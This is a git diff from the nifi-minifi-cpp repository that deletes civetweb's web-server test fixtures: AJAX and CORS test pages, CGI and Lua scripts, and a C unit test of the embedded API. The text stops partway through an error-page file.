http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/ajax/test.html ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/ajax/test.html b/thirdparty/civetweb-1.9.1/test/ajax/test.html deleted file mode 100644 index 40fa079..0000000 --- a/thirdparty/civetweb-1.9.1/test/ajax/test.html +++ /dev/null @@ -1,168 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> -<html> - <head> - <title>Test</title> - <script type='text/javascript' language="javascript" src='jquery.js'></script> - <script type='text/javascript' language="javascript"> - <!-- - - function mbox() { - alert('Javascript OK'); - } - - - var totalCount = 10; - var pendingCount = 0; - var errorCount = 0; - var pushCount = 0; - var allErrorCount = 0; - var autoTest = false; - var testType = "cgi"; - - function NextTestType() { - if (testType == "cgi") testType = "lp"; - else if (testType == "lp") testType = "lua"; - else testType = "cgi"; - } - - function runTest(method, isAsync) { - - ++pushCount; - document.getElementById('start').innerHTML = 'Test: ' + pushCount; - document.getElementById('resTotal').innerHTML = 'running'; - - for (var i = 1; i <= totalCount; ++i) { - document.getElementById('res'+i).innerHTML = "ready"; - } - - errorCount = 0; - pendingCount = totalCount; - - for (var i = 1; i <= totalCount; ++i) { - - fetch(i, method, isAsync); - } - } - - function runAutoTest() { - if (autoTest) { - runTest("POST", true) - setTimeout("runAutoTest()", 250) - } - } - - - function fetch(id, method, isAsync) { - - document.getElementById('res'+id).innerHTML = "pending"; - - $.ajax({ - async: isAsync, - url: 'echo.' + testType + '?id=' + id, - type: method, - timeout: 2000, - data: { 'id' : id , - 'longText1' : "adfsdfasdklkjlgasfdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui", - 'longText2' : "bsdfsdfasdklkjlgasdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui", - 'longText3' : "sdfsadagsdklkjlgasdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui", - 'longText4' : "q34sdfas3fhbkjlgasdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui", - 'longText5' : "askj2kjcvxychklgasdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui", - 'longText6' : "asdfjklhlkjhv8öajsdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui", - 'async' : isAsync - }, - dataType: 'json', - succes: function(data) { - }, - error: function() { - ++errorCount; - }, - complete: function(jqXHR, textStatus) { - - --pendingCount; - - document.getElementById('res'+id).innerHTML = textStatus; - console.log('id: ' + id + ' (' + pendingCount + '/' + totalCount + '), status: ' + textStatus); - - if (pendingCount == 0) { - document.getElementById('resTotal').innerHTML = 'done'; - console.log('complete, error count: ' + errorCount); - allErrorCount = allErrorCount + errorCount; - document.getElementById('resSAll').innerHTML = 'total errors: ' + allErrorCount + "/" + (pushCount*totalCount); - } - } - }); - - } - - - //--> - </script> - - </head> - <body> - <p> - <div id="start">Test not started.</div> - </p> - <p> - <table> - <tr> - <td> - <input id="testButton1" type="button" onclick="javascript:runTest('GET', false)" value="sync GET"></input> - </td> - <td> - <input id="testButton2" type="button" onclick="javascript:runTest('POST', false)" value="sync POST"></input> - </td> - </tr> - <tr> - <td> - <input id="testButton3" type="button" onclick="javascript:runTest('GET', true)" value="async GET"></input> - </td> - <td> - <input id="testButton4" type="button" onclick="javascript:runTest('POST', true)" value="async POST"></input> - </td> - </tr> - <tr> - <td> - <input id="testButton5" type="button" onclick="autoTest=!autoTest; javascript:runAutoTest()" value="automatic test"></input> - </td> - <td> - <input id="testButton6" type="button" onclick="NextTestType(); this.value=testType" value='cgi'></input> - </td> - </tr> - - <tr> - <td> - <input id="testButtonReset" type="button" onclick="autoTest=false; javascript:location.reload(true)" value="reset"></input> - </td> - <td> - <input id="testButtonBack" type="button" onclick="history.back()" value="back"></input> - </td> - </tr> - <tr> - <td> - <input id="testButtonBox" type="button" onclick="javascript:mbox()" value="MsgBox"></input> - </td> - <td> - </td> - </tr> - </table> - </p> - <p> - <table border="1"> - <tr><th>Test</th><th>Result</th></tr> - <tr><td>1</td><td><div id="res1">not started</div></td></tr> - <tr><td>2</td><td><div id="res2">not started</div></td></tr> - <tr><td>3</td><td><div id="res3">not started</div></td></tr> - <tr><td>4</td><td><div id="res4">not started</div></td></tr> - <tr><td>5</td><td><div id="res5">not started</div></td></tr> - <tr><td>6</td><td><div id="res6">not started</div></td></tr> - <tr><td>7</td><td><div id="res7">not started</div></td></tr> - <tr><td>8</td><td><div id="res8">not started</div></td></tr> - <tr><td>9</td><td><div id="res9">not started</div></td></tr> - <tr><td>10</td><td><div id="res10">not started</div></td></tr> - </table> - <div id="resTotal">Push [Test] to start.</div> - <div id="resSAll"></div> - </p> - </body> -</html>
http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/all_build_flags.pl ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/all_build_flags.pl b/thirdparty/civetweb-1.9.1/test/all_build_flags.pl deleted file mode 100755 index ee225f9..0000000 --- a/thirdparty/civetweb-1.9.1/test/all_build_flags.pl +++ /dev/null @@ -1,28 +0,0 @@ -#!/usr/bin/env perl - -@flags = ("NO_POPEN", "NO_SSL", "NDEBUG", "DEBUG", "NO_CGI"); -my $num_flags = @flags; - -sub fail { - print "FAILED: @_\n"; - exit 1; -} - -my $platform = $ARGV[0] || "linux"; - -for (my $i = 0; $i < 2 ** $num_flags; $i++) { - my $bitmask = sprintf("%*.*b", $num_flags, $num_flags, $i); - my @combination = (); - for (my $j = 0; $j < $num_flags; $j++) { - push @combination, $flags[$j] if substr($bitmask, $j, 1); - } - my $defines = join(" ", map { "-D$_" } @combination); - my $cmd = "CFLAGS=\"$defines\" make clean $platform >/dev/null"; - system($cmd) == 0 or fail "build failed: $_"; - print "Build succeeded, flags: [$defines]\n"; - system("perl test/test.pl basic_tests >/dev/null") == 0 - or fail "basic tests"; - print "Basic tests: OK\n"; -} - -print "PASS: All builds passed!\n"; http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/bad.cgi ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/bad.cgi b/thirdparty/civetweb-1.9.1/test/bad.cgi deleted file mode 100755 index ee4102b..0000000 --- a/thirdparty/civetweb-1.9.1/test/bad.cgi +++ /dev/null @@ -1,5 +0,0 @@ -#!/bin/sh - -echo "echoing bad headers: server must report status 500" -exec 1>&2 -echo shit!!! http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/bad2.cgi ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/bad2.cgi b/thirdparty/civetweb-1.9.1/test/bad2.cgi deleted file mode 100755 index efa4b54..0000000 --- a/thirdparty/civetweb-1.9.1/test/bad2.cgi +++ /dev/null @@ -1,3 +0,0 @@ -#!/usr/bin/env perl - -print "Status: 123 Please pass me to the client\r\n\r\n"; http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/bad_page.lp ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/bad_page.lp b/thirdparty/civetweb-1.9.1/test/bad_page.lp deleted file mode 100644 index 84caacc..0000000 --- a/thirdparty/civetweb-1.9.1/test/bad_page.lp +++ /dev/null @@ -1 +0,0 @@ -test <? bad_script ?> test http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/bad_script.lua ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/bad_script.lua b/thirdparty/civetweb-1.9.1/test/bad_script.lua deleted file mode 100644 index 6140617..0000000 --- a/thirdparty/civetweb-1.9.1/test/bad_script.lua +++ /dev/null @@ -1 +0,0 @@ -bad_script http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/cgi_test.c ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/cgi_test.c b/thirdparty/civetweb-1.9.1/test/cgi_test.c deleted file mode 100644 index bd446c0..0000000 --- a/thirdparty/civetweb-1.9.1/test/cgi_test.c +++ /dev/null @@ -1,40 +0,0 @@ -#include <stdio.h> -#include <string.h> -#include <stdlib.h> - -#if defined(_WIN32) || defined(WIN32) || defined(WINDOWS) -#include <fcntl.h> -#include <io.h> -#endif - -int -main(int argc, char *argv[]) -{ - char buf[1024]; - size_t rec_len = 0; - const char *response_header = "Content-Type: text/plain\r\n" - "Connection: close\r\n" - "\r\n"; - const char *req_method = getenv("REQUEST_METHOD"); - const char *con_length = getenv("CONTENT_LENGTH"); - -#if defined(_WIN32) || defined(WIN32) || defined(WINDOWS) - _setmode(_fileno(stdin), _O_BINARY); - _setmode(_fileno(stdout), _O_BINARY); -#endif - - /* Write the response header with \r\n */ - fwrite(response_header, 1, strlen(response_header), stdout); - - /* Headline for generated reply: */ - printf("Got message:\n Method: %s\n Content-Length: %s\n Content: ", - req_method, - con_length ? con_length : "not set"); - - /* Read all data from stdin and send it to stdout */ - while ((rec_len = fread(buf, 1, sizeof(buf) - 1, stdin)) > 0) { - fwrite(buf, 1, rec_len, stdout); - } - - return 0; -} http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/cgi_test.html ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/cgi_test.html b/thirdparty/civetweb-1.9.1/test/cgi_test.html deleted file mode 100644 index 28ad72b..0000000 --- a/thirdparty/civetweb-1.9.1/test/cgi_test.html +++ /dev/null @@ -1,12 +0,0 @@ -<html> - <head> - <title>CGI POST Test</title> - </head> - <body> - <h1>CGI POST Test</h1> - <form action="cgi_test.cgi" method="post"> - <input type="text" name="test" /> - <input type="submit" /> - </form> - </body> -</html> http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/civetweb_check.h ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/civetweb_check.h b/thirdparty/civetweb-1.9.1/test/civetweb_check.h deleted file mode 100644 index ddc6cfa..0000000 --- a/thirdparty/civetweb-1.9.1/test/civetweb_check.h +++ /dev/null @@ -1,60 +0,0 @@ -/* Copyright (c) 2015-2017 the Civetweb developers - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - */ -#ifndef TEST_CIVETWEB_CHECK_H_ -#define TEST_CIVETWEB_CHECK_H_ - -#ifdef __clang__ -#pragma clang diagnostic push -// FIXME: check uses GCC specific variadic macros that are non-standard -#pragma clang diagnostic ignored "-Wgnu-zero-variadic-macro-arguments" -#endif -#ifdef _MSC_VER -#undef pid_t -#define pid_t int -/* Unreferenced formal parameter. START_TEST has _i */ -#pragma warning(disable : 4100) -/* conditional expression is constant . asserts use while(0) */ -#pragma warning(disable : 4127) -#endif -#include <stdint.h> -#include "check.h" -#ifdef __clang__ -#pragma clang diagnostic pop -#endif - -#if !defined(_CRT_SECURE_NO_WARNINGS) -#define _CRT_SECURE_NO_WARNINGS -#endif -#if !defined(_CRT_SECURE_NO_DEPRECATE) -#define _CRT_SECURE_NO_DEPRECATE -#endif - -#ifdef __clang__ -/* When using -Weverything, clang does not accept it's own headers - * in a release build configuration. Disable what is too much in - * -Weverything. */ -#pragma clang diagnostic ignored "-Wdisabled-macro-expansion" -#endif - -/* A minimal timeout used for all tests with the "check" framework. */ -#define civetweb_min_test_timeout (30) - -#endif /* TEST_CIVETWEB_CHECK_H_ */ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/cors.html ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/cors.html b/thirdparty/civetweb-1.9.1/test/cors.html deleted file mode 100644 index 10fb99a..0000000 --- a/thirdparty/civetweb-1.9.1/test/cors.html +++ /dev/null @@ -1,75 +0,0 @@ -<!DOCTYPE html> -<html> -<head> -<title>CORS test</title> -<style> - html,body{font:normal 1em arial,helvetica;} -</style> - -<script> // http://www.html5rocks.com/en/tutorials/cors/ - -// Create the XHR object. -function createCORSRequest(method, url) { - var xhr = new XMLHttpRequest(); - if ("withCredentials" in xhr) { - // XHR for Chrome/Firefox/Opera/Safari. - xhr.open(method, url, true); - } else if (typeof XDomainRequest != "undefined") { - // XDomainRequest for IE. - xhr = new XDomainRequest(); - xhr.open(method, url); - } else { - // CORS not supported. - xhr = null; - } - return xhr; -} - -// Helper method to parse the title tag from the response. -function getTitle(text) { - return text.match('<title>(.*)?</title>')[1]; -} - -// Make the actual CORS request. -function makeCorsRequest(method, resource) { - var url = "http://localhost:8080/cors.reply." + resource; - var xhr = createCORSRequest(method, url); - if (!xhr) { - alert('ERROR: CORS not supported'); - return; - } - - // Response handlers. - xhr.onload = function() { - var text = xhr.responseText; - var title = getTitle(text); - alert('Response from CORS request to ' + url + ':\n' + title); - }; - - xhr.onerror = function() { - alert('ERROR: the request failed.'); - }; - - xhr.send(); -} - -function start() { - var el = document.getElementById("from"); - el.innerHTML = "Test CORS from " + document.URL + " to http://localhost:8080/cors.reply.*"; - if ((document.URL.indexOf("localhost") >= 0) || (document.URL.indexOf("127.0.0.1") >= 0)) { - alert("This CORS test is only meaningful, if you open this site with a different url than \'localhost\' (127.0.0.1).\nYou may use a different IP of the same machine."); - } -} -</script> - -</head> -<body onload="start()"> - <h1>Cross-origin resource sharing test</h1> - <p id="from">*** Error: Javascript is not activated. This test will not work. ***</p> - <button onclick="makeCorsRequest('GET', 'html')">Run CORS GET request (static resource)</button> - <button onclick="makeCorsRequest('GET', 'shtml')">Run CORS GET request (ssi)</button> - <button onclick="makeCorsRequest('GET', 'lua/getit')">Run CORS GET request (dynamic resource)</button> - <button onclick="makeCorsRequest('PUT', 'lua/putit')">Run CORS PUT request (dynamic resource)</button> - <p>More information on CORS: See <a href="http://enable-cors.org/">enable-cors.org</a> and <a href="http://www.html5rocks.com/en/tutorials/cors/">html5rocks.com</a>.</p> -</body> -</html> http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/cors.reply.html ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/cors.reply.html b/thirdparty/civetweb-1.9.1/test/cors.reply.html deleted file mode 100644 index 26d88df..0000000 --- a/thirdparty/civetweb-1.9.1/test/cors.reply.html +++ /dev/null @@ -1,7 +0,0 @@ -<!DOCTYPE html> -<html> -<head><title>CORS test reply - test OK</title></head> -<body> -Do not load this page directly - use cors.html instead! -</body> -</html> http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/cors.reply.lua ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/cors.reply.lua b/thirdparty/civetweb-1.9.1/test/cors.reply.lua deleted file mode 100644 index 9a659a9..0000000 --- a/thirdparty/civetweb-1.9.1/test/cors.reply.lua +++ /dev/null @@ -1,73 +0,0 @@ --- http://www.html5rocks.com/static/images/cors_server_flowchart.png - -if not mg.request_info.http_headers.Origin then - mg.write("HTTP/1.0 200 OK\r\n") - mg.write("Connection: close\r\n") - mg.write("Content-Type: text/html; charset=utf-8\r\n") - mg.write("\r\n") - mg.write("This test page should not be used directly. Open cors.html instead.") - return -end - -if mg.request_info.request_method == "OPTIONS" then - - local acrm = mg.request_info.http_headers['Access-Control-Request-Method']; - if (acrm) then - local acrh = nil -- mg.request_info.http_headers['Access-Control-Request-Header']; - if (acrm~='PUT') then - -- invalid request - mg.write("HTTP/1.0 403 Forbidden\r\n") - mg.write("Connection: close\r\n") - mg.write("\r\n") - return - else - -- preflight request - mg.write("HTTP/1.0 200 OK\r\n") - mg.write("Access-Control-Allow-Methods: PUT\r\n") - if (acrh) then - mg.write("Access-Control-Allow-Headers: " .. acrh .. "\r\n") - end - mg.write("Access-Control-Allow-Origin: *\r\n") - mg.write("Connection: close\r\n") - mg.write("Content-Type: text/html; charset=utf-8\r\n") - mg.write("\r\n") - return - end - end -end - --- actual request -if mg.request_info.request_method == "GET" then - mg.write("HTTP/1.0 200 OK\r\n") - mg.write("Access-Control-Allow-Origin: *\r\n") - mg.write("Connection: close\r\n") - mg.write("Content-Type: text/html; charset=utf-8\r\n") - mg.write("\r\n") - mg.write([[<!DOCTYPE html> - <html> - <head><title>CORS dynamic GET test reply - test OK</title></head> - <body>This should never be shown</body> - </html> - ]]) - return -end - - -if mg.request_info.request_method == "PUT" then - mg.write("HTTP/1.0 200 OK\r\n") - mg.write("Access-Control-Allow-Origin: *\r\n") - mg.write("Connection: close\r\n") - mg.write("Content-Type: text/html; charset=utf-8\r\n") - mg.write("\r\n") - mg.write([[<!DOCTYPE html> - <html> - <head><title>CORS dynamic PUT test reply - test OK</title></head> - <body>This should never be shown</body> - </html> - ]]) - return -end - -mg.write("HTTP/1.0 403 Forbidden\r\n") -mg.write("Connection: close\r\n") -mg.write("\r\n") http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/cors.reply.shtml ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/cors.reply.shtml b/thirdparty/civetweb-1.9.1/test/cors.reply.shtml deleted file mode 100644 index 26d88df..0000000 --- a/thirdparty/civetweb-1.9.1/test/cors.reply.shtml +++ /dev/null @@ -1,7 +0,0 @@ -<!DOCTYPE html> -<html> -<head><title>CORS test reply - test OK</title></head> -<body> -Do not load this page directly - use cors.html instead! -</body> -</html> http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/dir with spaces/hello.cgi ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/dir with spaces/hello.cgi b/thirdparty/civetweb-1.9.1/test/dir with spaces/hello.cgi deleted file mode 100755 index 39decbe..0000000 --- a/thirdparty/civetweb-1.9.1/test/dir with spaces/hello.cgi +++ /dev/null @@ -1,3 +0,0 @@ -#!/usr/bin/env perl - -print "Content-Type: text/plain\n\nhello\n"; http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/echo.lua ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/echo.lua b/thirdparty/civetweb-1.9.1/test/echo.lua deleted file mode 100644 index bc71553..0000000 --- a/thirdparty/civetweb-1.9.1/test/echo.lua +++ /dev/null @@ -1,41 +0,0 @@ - -if mg.lua_type ~= "websocket" then - mg.write("HTTP/1.0 403 Forbidden\r\n") - mg.write("Connection: close\r\n") - mg.write("\r\n") - mg.write("forbidden") - return -end - - --- table of all active connection -allConnections = {} - --- function to get a client identification string -function who(tab) - local ri = allConnections[tab.client].request_info - return ri.remote_addr .. ":" .. ri.remote_port -end - --- Callback to accept or reject a connection -function open(tab) - allConnections[tab.client] = tab - return true -- return true to accept the connection -end - --- Callback for "Websocket ready" -function ready(tab) - return true -- return true to keep the connection open -end - --- Callback for "Websocket received data" -function data(tab) - mg.write(1, tab.data); - return true -- return true to keep the connection open -end - --- Callback for "Websocket is closing" -function close(tab) - allConnections[tab.client] = nil -end - http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/embed.c ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/embed.c b/thirdparty/civetweb-1.9.1/test/embed.c deleted file mode 100644 index 174e17c..0000000 --- a/thirdparty/civetweb-1.9.1/test/embed.c +++ /dev/null @@ -1,182 +0,0 @@ -// Copyright (c) 2004-2009 Sergey Lyubka -// -// Permission is hereby granted, free of charge, to any person obtaining a copy -// of this software and associated documentation files (the "Software"), to deal -// in the Software without restriction, including without limitation the rights -// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -// copies of the Software, and to permit persons to whom the Software is -// furnished to do so, subject to the following conditions: -// -// The above copyright notice and this permission notice shall be included in -// all copies or substantial portions of the Software. -// -// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN -// THE SOFTWARE. -// -// Unit test for the civetweb web server. Tests embedded API. - - -#include <stdlib.h> -#include <stdio.h> -#include <string.h> -#ifndef _WIN32 -#include <unistd.h> -#endif - -#include "civetweb.h" - -#if !defined(LISTENING_PORT) -#define LISTENING_PORT "23456" -#endif - -static const char *standard_reply = "HTTP/1.1 200 OK\r\n" - "Content-Type: text/plain\r\n" - "Connection: close\r\n\r\n"; - -static void test_get_var(struct mg_connection *conn, - const struct mg_request_info *ri) { - char *var, *buf; - size_t buf_len; - const char *cl; - int var_len; - - mg_printf(conn, "%s", standard_reply); - - buf_len = 0; - var = buf = NULL; - cl = mg_get_header(conn, "Content-Length"); - mg_printf(conn, "cl: %p\n", cl); - if ((!strcmp(ri->request_method, "POST") || - !strcmp(ri->request_method, "PUT")) - && cl != NULL) { - buf_len = atoi(cl); - buf = malloc(buf_len); - /* Read in two pieces, to test continuation */ - if (buf_len > 2) { - mg_read(conn, buf, 2); - mg_read(conn, buf + 2, buf_len - 2); - } else { - mg_read(conn, buf, buf_len); - } - } else if (ri->query_string != NULL) { - buf_len = strlen(ri->query_string); - buf = malloc(buf_len + 1); - strcpy(buf, ri->query_string); - } - var = malloc(buf_len + 1); - var_len = mg_get_var(buf, buf_len, "my_var", var, buf_len + 1); - mg_printf(conn, "Value: [%s]\n", var); - mg_printf(conn, "Value size: [%d]\n", var_len); - free(buf); - free(var); -} - -static void test_get_header(struct mg_connection *conn, - const struct mg_request_info *ri) { - const char *value; - int i; - - mg_printf(conn, "%s", standard_reply); - printf("HTTP headers: %d\n", ri->num_headers); - for (i = 0; i < ri->num_headers; i++) { - printf("[%s]: [%s]\n", ri->http_headers[i].name, ri->http_headers[i].value); - } - - value = mg_get_header(conn, "Host"); - if (value != NULL) { - mg_printf(conn, "Value: [%s]", value); - } -} - -static void test_get_request_info(struct mg_connection *conn, - const struct mg_request_info *ri) { - int i; - - mg_printf(conn, "%s", standard_reply); - - mg_printf(conn, "Method: [%s]\n", ri->request_method); - mg_printf(conn, "URI: [%s]\n", ri->uri); - mg_printf(conn, "HTTP version: [%s]\n", ri->http_version); - - for (i = 0; i < ri->num_headers; i++) { - mg_printf(conn, "HTTP header [%s]: [%s]\n", - ri->http_headers[i].name, - ri->http_headers[i].value); - } - - mg_printf(conn, "Query string: [%s]\n", - ri->query_string ? ri->query_string: ""); - mg_printf(conn, "Remote IP: [%lu]\n", ri->remote_ip); - mg_printf(conn, "Remote port: [%d]\n", ri->remote_port); - mg_printf(conn, "Remote user: [%s]\n", - ri->remote_user ? ri->remote_user : ""); -} - -static void test_error(struct mg_connection *conn, - const struct mg_request_info *ri) { - int status = (int) ri->ev_data; - mg_printf(conn, "HTTP/1.1 %d XX\r\n" - "Conntection: close\r\n\r\n", status); - mg_printf(conn, "Error: [%d]", status); -} - -static void test_post(struct mg_connection *conn, - const struct mg_request_info *ri) { - const char *cl; - char *buf; - int len; - - mg_printf(conn, "%s", standard_reply); - if (strcmp(ri->request_method, "POST") == 0 && - (cl = mg_get_header(conn, "Content-Length")) != NULL) { - len = atoi(cl); - if ((buf = malloc(len)) != NULL) { - mg_write(conn, buf, len); - free(buf); - } - } -} - -static const struct test_config { - enum mg_event event; - const char *uri; - void (*func)(struct mg_connection *, const struct mg_request_info *); -} test_config[] = { - {MG_NEW_REQUEST, "/test_get_header", &test_get_header}, - {MG_NEW_REQUEST, "/test_get_var", &test_get_var}, - {MG_NEW_REQUEST, "/test_get_request_info", &test_get_request_info}, - {MG_NEW_REQUEST, "/test_post", &test_post}, - {MG_HTTP_ERROR, "", &test_error}, - {0, NULL, NULL} -}; - -static void *callback(enum mg_event event, - struct mg_connection *conn) { - const struct mg_request_info *request_info = mg_get_request_info(conn); - int i; - - for (i = 0; test_config[i].uri != NULL; i++) { - if (event == test_config[i].event && - (event == MG_HTTP_ERROR || - !strcmp(request_info->uri, test_config[i].uri))) { - test_config[i].func(conn, request_info); - return "processed"; - } - } - - return NULL; -} - -int main(void) { - struct mg_context *ctx; - const char *options[] = {"listening_ports", LISTENING_PORT, NULL}; - - ctx = mg_start(callback, NULL, options); - pause(); - return 0; -} http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/env.cgi ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/env.cgi b/thirdparty/civetweb-1.9.1/test/env.cgi deleted file mode 100755 index 479e1fd..0000000 --- a/thirdparty/civetweb-1.9.1/test/env.cgi +++ /dev/null @@ -1,46 +0,0 @@ -#!/usr/bin/env perl - -use Cwd; -use CGI; - -use vars '%in'; -CGI::ReadParse(); - -print "Content-Type: text/html\r\n\r\n"; - -print "<pre>\n"; -foreach my $key (sort keys %ENV) { - print "$key=$ENV{$key}\n"; -} - -print "\n"; - -foreach my $key (sort keys %in) { - print "$key=$in{$key}\n"; -} - -print "\n"; - -print 'CURRENT_DIR=' . getcwd() . "\n"; -print "</pre>\n"; - -my $stuff = <<EOP ; -<script language="javascript"> - function set_val() { - } -</script> -<form method=get> - <input type=hidden name=a> - <input type=text name=_a onChange="javascript: this.form.a.value=this.value;"> - <input type=submit value=get> -</form> - -<form method=post> - <input type=text name=b> - <input type=submit value=post> -</form> -EOP - -#system('some shit'); - -print $stuff; http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/error.lua ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/error.lua b/thirdparty/civetweb-1.9.1/test/error.lua deleted file mode 100644 index b78d4ac..0000000 --- a/thirdparty/civetweb-1.9.1/test/error.lua +++ /dev/null @@ -1,12 +0,0 @@ -mg.write("HTTP/1.0 200 OK\r\n") -mg.write("Content-Type: text/html\r\n") -mg.write("\r\n") -mg.write([[<html><body> - <p>Lua error handler:</p> - <p>Status code: ]]) - -mg.write(tostring(mg.request_info.status)) - -mg.write([[</p> -</body></html> -]]) \ No newline at end of file http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/error404.htm ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/error404.htm b/thirdparty/civetweb-1.9.1/test/error404.htm deleted file mode 100644 index 357db2c..0000000 --- a/thirdparty/civetweb-1.9.1/test/error404.htm +++ /dev/null @@ -1,10 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD 